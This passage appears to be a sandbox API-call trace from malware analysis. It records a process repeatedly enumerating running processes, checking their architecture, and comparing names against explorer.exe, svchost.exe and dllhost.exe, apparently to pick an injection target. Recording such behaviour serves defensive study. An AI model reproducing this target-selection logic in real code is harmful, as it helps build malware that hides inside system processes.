th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0175.763] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0175.763] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0175.763] CloseHandle (hObject=0xd8) returned 1 [0175.763] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0175.764] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0175.764] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0175.764] CloseHandle (hObject=0xd8) returned 1 [0175.764] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0175.764] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0175.764] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0175.764] CloseHandle (hObject=0xd8) returned 1 [0175.764] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0175.765] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0175.765] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0175.765] CloseHandle (hObject=0xd8) returned 1 [0175.765] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0175.765] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0175.765] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0175.765] CloseHandle (hObject=0xd8) returned 1 [0175.766] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0175.766] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0175.766] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0175.766] CloseHandle (hObject=0xd8) returned 1 [0175.766] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0175.767] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0175.767] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0175.767] CloseHandle (hObject=0xd8) returned 1 [0175.767] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0175.767] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0175.767] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0175.767] CloseHandle (hObject=0xd8) returned 1 [0175.767] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0175.768] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0175.768] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0175.768] CloseHandle (hObject=0xd8) returned 1 [0175.768] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0175.768] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0175.768] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0175.768] CloseHandle (hObject=0xd8) returned 1 [0175.768] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0175.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0175.769] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0175.769] CloseHandle (hObject=0xd8) returned 1 [0175.769] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0175.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0175.770] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0175.770] CloseHandle (hObject=0xd8) returned 1 [0175.770] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0175.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0175.770] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0175.770] CloseHandle (hObject=0xd8) returned 1 [0175.770] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0175.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0175.771] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0175.771] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0175.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0175.772] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0175.772] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0175.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0175.773] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0175.773] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0175.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0175.774] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0175.774] CloseHandle (hObject=0xd8) returned 1 [0175.774] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0175.774] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0175.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0175.775] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0175.775] CloseHandle (hObject=0xd8) returned 1 [0175.775] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0175.775] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0175.775] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0175.775] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0175.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0175.775] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0175.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0175.776] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0175.776] CloseHandle (hObject=0xd8) returned 1 [0175.776] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0175.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0175.777] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0175.777] CloseHandle (hObject=0xd8) returned 1 [0175.777] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0175.777] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0175.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0175.777] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0175.777] CloseHandle (hObject=0xd8) returned 1 [0175.777] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0175.778] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x790, pcPriClassBase=6, dwFlags=0x0, szExeFile="regsvr32.exe")) returned 1 [0175.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x968) returned 0xd8 [0175.778] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0175.778] CloseHandle (hObject=0xd8) returned 1 [0175.778] lstrcmpiA (lpString1="regsvr32.exe", lpString2="explorer.exe") returned 1 [0175.778] lstrcmpiA (lpString1="regsvr32.exe", lpString2="svchost.exe") returned -1 [0175.778] lstrcmpiA (lpString1="regsvr32.exe", lpString2="dllhost.exe") returned 1 [0175.779] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0175.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xd8 [0175.779] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0175.779] CloseHandle (hObject=0xd8) returned 1 [0175.779] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0175.780] CloseHandle (hObject=0xd4) returned 1 [0175.780] Sleep (dwMilliseconds=0x3e8) [0176.813] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0176.816] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0176.816] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0176.816] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0176.817] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0176.817] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0176.817] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0176.817] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0176.818] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0176.818] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0176.818] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0176.818] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0176.819] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0176.819] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0176.819] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0176.819] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0176.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0176.820] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0176.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0176.820] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0176.821] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0176.821] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.821] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0176.821] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0176.822] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0176.822] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.823] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0176.823] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.823] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0176.823] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0176.824] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0176.824] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.824] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0176.824] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.825] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0176.825] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0176.825] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0176.825] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0176.825] CloseHandle (hObject=0xd8) returned 1 [0176.825] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0176.825] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0176.826] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0176.826] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0176.826] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0176.826] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0176.827] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0176.827] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0176.827] CloseHandle (hObject=0xd8) returned 1 [0176.827] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0176.827] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0176.827] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0176.827] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.827] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0176.827] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0176.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0176.828] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0176.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0176.828] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0176.828] CloseHandle (hObject=0xd8) returned 1 [0176.828] Process32Next (in: 